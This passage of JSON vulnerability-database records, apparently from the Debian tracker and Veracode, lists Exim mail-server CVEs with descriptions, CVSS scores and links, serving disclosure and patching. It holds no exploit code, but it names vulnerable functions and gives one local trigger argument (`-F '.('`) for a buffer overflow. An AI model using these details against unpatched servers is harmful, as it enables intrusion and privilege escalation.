false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28026"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28026", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28026", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T14:54:32", "description": "Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow in receive_add_recipient via an e-mail message with fifty million recipients. NOTE: remote exploitation may be difficult because of resource consumption.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28017", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28017"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28017", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28017", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T14:54:32", "description": "Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. Local users can alter the behavior of root processes because a recipient address can have a newline character.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28015", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28015"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28015", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28015", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-13T14:32:07", "description": "A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-05T14:29:00", "type": "debiancve", "title": "CVE-2019-10149", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-05T14:29:00", "id": "DEBIANCVE:CVE-2019-10149", "href": "https://security-tracker.debian.org/tracker/CVE-2019-10149", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:12:48", "description": "Exim 4 before 4.94.2 has Execution with Unnecessary Privileges. By leveraging a delete_pid_file race condition, a local user can delete arbitrary files as root. This involves the -oP and -oPX options.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.3, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2021-27216", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.3, "vectorString": "AV:L/AC:M/Au:N/C:N/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27216"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2021-27216", "href": "https://security-tracker.debian.org/tracker/CVE-2021-27216", "cvss": {"score": 6.3, "vector": "AV:L/AC:M/Au:N/C:N/I:C/A:C"}}], "veracode": [{"lastseen": "2022-07-26T13:31:39", "description": "exim is vulnerable to denial of service. The vulnerability exists due to a Use After Free in smtp_reset in certain situations that may be common for builds with OpenSSL.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T12:13:35", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28018"], "modified": "2021-05-26T20:14:22", "id": "VERACODE:30369", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30369/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T13:49:07", "description": "exim4:buster is vulnerable to heap buffer overflow in queue_run().\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T22:33:31", "type": "veracode", "title": "Heap Buffer Overflow", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28011"], "modified": "2021-05-10T20:47:38", "id": "VERACODE:30337", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30337/summary", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-26T13:49:09", "description": "exim4 is vulnerable to arbitrary code execution. A heap out-of-bounds write in `parse_fix_phrase()` allows an attacker to execute arbitrary code on the host OS.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T12:13:33", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28016"], "modified": "2021-05-10T20:47:35", "id": "VERACODE:30368", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30368/summary", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-26T13:49:08", "description": "exim4:buster is vulnerable to denial of service and other assorted attacks in Exim's spool directory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T22:32:47", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28008"], "modified": "2021-05-10T22:47:37", "id": "VERACODE:30331", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30331/summary", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-26T13:31:41", "description": "exim4 is vulnerable to arbitrary code execution. An integer overflow allows an attacker to execute arbitrary code on the host OS by leveraging on the mishandling of continuation lines during header-length restriction.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T12:15:21", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28020"], "modified": "2021-09-03T18:46:50", "id": "VERACODE:30370", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30370/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T13:49:09", "description": "exim4 is vulnerable to privilege escalation. The vulnerability exists when `allow_filter` is true, using a missing close-on-exec flag for a privileged pipe. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T22:33:35", "type": "veracode", "title": "Privilege Escalation", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28012"], "modified": "2022-07-13T12:56:24", "id": "VERACODE:30338", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30338/summary", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-26T16:32:06", "description": "exim4:buster is vulnerable to an arbitrary file creation and clobbering.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2021-05-04T22:33:39", "type": "veracode", "title": "Arbitrary File Creation And Clobbering", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 5.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 7.8, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28014"], "modified": "2022-07-13T12:54:22", "id": "VERACODE:30340", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30340/summary", "cvss": {"score": 5.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:C"}}, {"lastseen": "2022-07-26T13:31:40", "description": "exim4 is vulnerable to arbitrary code execution. A heap buffer underflow in `smtp_ungetc()` allows an attacker to execute arbitrary code on the host OS.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T22:34:08", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28024"], "modified": "2021-05-10T18:47:31", "id": "VERACODE:30345", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30345/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T13:49:09", "description": "exim4 is vulnerable to privilege escalation. The vulnerability exists due to a boundary error within the main() function. A local user can trigger an out-of-bounds write and execute arbitrary code on the target system with elevated privileges.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T22:33:42", "type": "veracode", "title": "Privilege Escalation", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28010"], "modified": "2021-05-10T20:47:38", "id": "VERACODE:30341", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30341/summary", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-26T13:31:45", "description": "exim4:buster is vulnerable to Heap out-of-bounds read and write in extract_option().\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T22:34:02", "type": "veracode", "title": "Out-of-bounds Read And Write", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28022"], "modified": "2021-05-10T18:47:31", "id": "VERACODE:30343", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30343/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T16:34:21", "description": "exim4 is vulnerable to information disclosure. The vulnerability exists due to a boundary condition in smtp_setup_msg() function. A remote attacker can send specially crafted message to the system, trigger out-of-bounds read error and read contents of memory on the system.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-04T22:34:05", "type": "veracode", "title": "Information Disclosure", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28023"], "modified": "2021-05-10T18:47:32", "id": "VERACODE:30344", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30344/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-04-18T06:51:49", "description": "exim4 is vulnerable to arbitrary code execution. An integer overflow in `receive_add_recipient()` could potentially allow an attacker to execute arbitrary code on the host OS.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T22:33:27", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28017"], "modified": "2022-10-04T16:48:21", "id": "VERACODE:30336", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30336/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T13:49:10", "description": "exim4 is vulnerable to privilege escalation. The vulnerability exists due to a new-line injection into spool header files.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T22:33:26", "type": "veracode", "title": "Privilege Escalation", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28015"], "modified": "2021-05-10T20:47:35", "id": "VERACODE:30335", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30335/summary", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-26T13:49:10", "description": "exim4 is vulnerable to arbitrary code execution. If a local attacker executes Exim with affected functions such as `-F '.('`, a buffer overflow would occur in `parse_fix_phrase()` when it calls `strncpy()` with a -1 size, potentially allowing for arbitrary code execution on the host OS.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T22:33:38", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28013"], "modified": "2021-05-10T20:47:36", "id": "VERACODE:30339", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30339/summary", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-26T16:34:21", "description": "exim4:buster is vulnerable to an heap out-of-bounds read in pdkim_finish_bodyhash().\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-04T22:34:09", "type": "veracode", "title": "Heap Out-of-bounds Read", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": 